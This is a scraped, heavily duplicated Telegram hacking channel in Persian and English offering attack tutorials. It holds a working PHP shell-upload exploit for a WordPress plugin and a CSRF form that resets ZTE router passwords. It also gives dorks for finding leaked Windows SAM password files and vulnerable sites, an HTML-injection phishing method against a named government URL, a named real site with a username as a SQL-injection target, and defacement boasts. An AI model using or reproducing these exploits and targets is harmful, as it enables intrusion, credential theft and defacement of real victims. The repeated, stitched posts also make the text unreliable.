trojan.cpp
2.2 KB
کیلاگر ضبط کننده ی کلید ها!
http://izkalite.gov.tr/portal/hata.php?mesaj=
میبیند که میتونید تگ های Html خودتون رو جلوی = بذارید و صفحه تغییر پیدا کنه
هکر ها یا کلاه برداران اینترنتی از این ها جهت فریب تارگت هاشون استفاده
میبیند که میتونید تگ های Html خودتون رو جلوی = بذارید و صفحه تغییر پیدا کنه
هکر ها یا کلاه برداران اینترنتی از این ها جهت فریب تارگت هاشون استفاده
0Day.Today | Learn Exploit | Zero World | Dark web |
http://izkalite.gov.tr/portal/hata.php?mesaj= میبیند که میتونید تگ های Html خودتون رو جلوی = بذارید و صفحه تغییر پیدا کنه هکر ها یا کلاه برداران اینترنتی از این ها جهت فریب تارگت هاشون استفاده
میکنند و ممکنه با تگ iframe
ادرس صفحه فیک خودشون رو تو فریم بذارن و جهت دست یافتن به اطلاعات بانکی یا کاربری استفاده کنند.
#uzi
@LearnEXPLOiT
ادرس صفحه فیک خودشون رو تو فریم بذارن و جهت دست یافتن به اطلاعات بانکی یا کاربری استفاده کنند.
#uzi
@LearnEXPLOiT
اموزش بدست اوردن
userName & password
سیستم ویندوز از طریق سایت 😄
------
#Find #SAM file with a #Dork (#GHDB) #OS_Windows
-----
@LearnExploit
userName & password
سیستم ویندوز از طریق سایت 😄
------
#Find #SAM file with a #Dork (#GHDB) #OS_Windows
-----
@LearnExploit
اموزش بدست اوردن
userName & password
سیستم ویندوز از طریق سایت 😄
------
#Find #SAM file with a #Dork (#GHDB) #OS_Windows
------
شاید اول از هر چیزی بپرسید که SAM چیه ؟
دوستان SAM با همون
Security Account Manager
است که user and pass ویندوز رو درون خودش نگهداری میکنه !
فایل SAM ساختار ساده ای داره و از دو نوع الگوریتم Hashing به نام های LM (یه یک الگریتم ضعیف بوده) و NTLM (که یک الگریتم جدید و بهبود یافته است) .
شما میتونید فایل SAM ویندوز خودتون رو از مسیر زیر بدست بیارید :
%SystemRoot%/system32/config/SAM
(در مورد Dump این فاید بعدا صحبت میکنیم).
_
حالا روش بدست اوردن این فایل از طریق وب :
Dork : filetype:txt Administrator:500:
و تمام :)
نمونه :
https://www.albany.edu/~goel/classes/spring2010/itm604/pwfile.txt
=====================
#X0P4SH4
T.me/LearnExploit
0Day.Today
userName & password
سیستم ویندوز از طریق سایت 😄
------
#Find #SAM file with a #Dork (#GHDB) #OS_Windows
------
شاید اول از هر چیزی بپرسید که SAM چیه ؟
دوستان SAM با همون
Security Account Manager
است که user and pass ویندوز رو درون خودش نگهداری میکنه !
فایل SAM ساختار ساده ای داره و از دو نوع الگوریتم Hashing به نام های LM (یه یک الگریتم ضعیف بوده) و NTLM (که یک الگریتم جدید و بهبود یافته است) .
شما میتونید فایل SAM ویندوز خودتون رو از مسیر زیر بدست بیارید :
%SystemRoot%/system32/config/SAM
(در مورد Dump این فاید بعدا صحبت میکنیم).
_
حالا روش بدست اوردن این فایل از طریق وب :
Dork : filetype:txt Administrator:500:
و تمام :)
نمونه :
https://www.albany.edu/~goel/classes/spring2010/itm604/pwfile.txt
=====================
#X0P4SH4
T.me/LearnExploit
0Day.Today
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
#Hacked By #X0P4SH4
https://mirror-h.org/zone/1605229/
Heh.... just for fun :)
@LearnExploit
0Day.Today
https://mirror-h.org/zone/1605229/
Heh.... just for fun :)
@LearnExploit
0Day.Today
#Hacked By #X0P4SH4
https://mirror-h.org/zone/1605233/
Heh.... just for fun :)
@LearnExploit
0Day.Today
https://mirror-h.org/zone/1605233/
Heh.... just for fun :)
@LearnExploit
0Day.Today
#Hacked By #X0P4SH4
https://mirror-h.org/zone/1605238/
Heh.... just for fun :)
@LearnExploit
0Day.Today
https://mirror-h.org/zone/1605238/
Heh.... just for fun :)
@LearnExploit
0Day.Today
نحوه ی هک (دیفیس) سایت توسط باگ Url Posting
#Url_Posting #Bug #Deface
-------------------------------
همان طور که از اسم سایت پیداست شما میتونید با استفاده از این باگ و به وسیله ی URL در سایت تغییراتی ایجاد کنید.
دورک مورد استفاده دراین باگ :
<Start ~ Dorks >
| site:ua "j images jdownloads screenshots version php j"
| site:ua "wp content uploads gravity forms index php option com jdownloads"
| site:ua "plugins editors jce tiny mce plugins cfg contactform"
| site:ua "cfg contactform"
<end ~ Dorks>
~~~~~~~~~~~~~~
POC ~ Exploiting :
just change Url of site ::::
http[s]://Example.me/HACKED-BY-X0P4SH4
:)
#X0P4SH4
t.me/LearnExploit
0Day.Today
#Url_Posting #Bug #Deface
-------------------------------
همان طور که از اسم سایت پیداست شما میتونید با استفاده از این باگ و به وسیله ی URL در سایت تغییراتی ایجاد کنید.
دورک مورد استفاده دراین باگ :
<Start ~ Dorks >
| site:ua "j images jdownloads screenshots version php j"
| site:ua "wp content uploads gravity forms index php option com jdownloads"
| site:ua "plugins editors jce tiny mce plugins cfg contactform"
| site:ua "cfg contactform"
<end ~ Dorks>
~~~~~~~~~~~~~~
POC ~ Exploiting :
just change Url of site ::::
http[s]://Example.me/HACKED-BY-X0P4SH4
:)
#X0P4SH4
t.me/LearnExploit
0Day.Today
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
#TarGet
~ :
http://www.janinedrayson.co.uk/
#User
~ :
Janinedr
#Pass
~:
Find By self :)
#Bug
~:
Sql
Have Nice day !
there [0Day.Today] Of telegram
ID : @LearnExploit
~ :
http://www.janinedrayson.co.uk/
#User
~ :
Janinedr
#Pass
~:
Find By self :)
#Bug
~:
Sql
~~~~~~~~~~~~
Have Nice day !
I'm X0P4SH4
there [0Day.Today] Of telegram
ID : @LearnExploit
#WP(Wordpress) #Hacking #Plugin (Peugeot-Music-Plugin) #Exploit
-------------~______~---------
#Dork
~:
inurl:"/wp-content/plugins/peugeot-music-plugin/"
#Vul Url :
~:
"wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"
#Exploit
~:
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
⭕️ For CSRF using php xampp.
#Shell_Locate:
~:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php
========================
#GOODNIGHT
#X0P4SH4
T.me/LearnExploit
0Day.Today
-------------~______~---------
#Dork
~:
inurl:"/wp-content/plugins/peugeot-music-plugin/"
#Vul Url :
~:
"wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"
#Exploit
~:
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
⭕️ For CSRF using php xampp.
#Shell_Locate:
~:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php
========================
#GOODNIGHT
#X0P4SH4
T.me/LearnExploit
0Day.Today
👍1
اموزش نحوه ی #اکسپلویت #روتر های TeDate-ZTE
How to #Exploit #TeDate_ZTE #Rauter's
---> ~# @LearnExploit
---------
How to #Exploit #TeDate_ZTE #Rauter's
---> ~# @LearnExploit
---------
title :
( #TeDate_ZTE #Exploiting )
#Url_Patch
~#
/forms/tools_admin_1/
#Exploit
~#
<html>
<body onload="document.alqnas.submit()">
<form action="http://192.168.1.1/Forms/tools_admin_1" method="post" name="alqnas"> //Put Here Ur Rauter IP
<input type="hidden" name="uiViewTools_Password" value="new pass" />
<input type="hidden" name="uiViewTools_PasswordConfirm" value="new pass" />
</form>
</body>
</html>
#Explanations
~#
این باگ از نوع CSRF بوده و در این اکسپلویت درخواست تغییر یوزرنیم و پسورد رو میده
روش اجرا :
موارد زیر رو به نفع خودتون تغییر بدید 😄 :
name="Ur New Username "
value="Ur New Pass"
value="config Ur New Pass"
سپس اکسپلویت رو با پسوند .html سیو کرده
و اجرا کنید :)
روتر یوزر و پسورد جدید رو دریافت کرده :)
================
#X0P4SH4
-->
@LearnExploit ~ 0Day.Today
( #TeDate_ZTE #Exploiting )
#Url_Patch
~#
/forms/tools_admin_1/
#Exploit
~#
<html>
<body onload="document.alqnas.submit()">
<form action="http://192.168.1.1/Forms/tools_admin_1" method="post" name="alqnas"> //Put Here Ur Rauter IP
<input type="hidden" name="uiViewTools_Password" value="new pass" />
<input type="hidden" name="uiViewTools_PasswordConfirm" value="new pass" />
</form>
</body>
</html>
#Explanations
~#
این باگ از نوع CSRF بوده و در این اکسپلویت درخواست تغییر یوزرنیم و پسورد رو میده
روش اجرا :
موارد زیر رو به نفع خودتون تغییر بدید 😄 :
name="Ur New Username "
value="Ur New Pass"
value="config Ur New Pass"
سپس اکسپلویت رو با پسوند .html سیو کرده
و اجرا کنید :)
روتر یوزر و پسورد جدید رو دریافت کرده :)
================
#X0P4SH4
-->
Router Hacking
@LearnExploit ~ 0Day.Today
👍1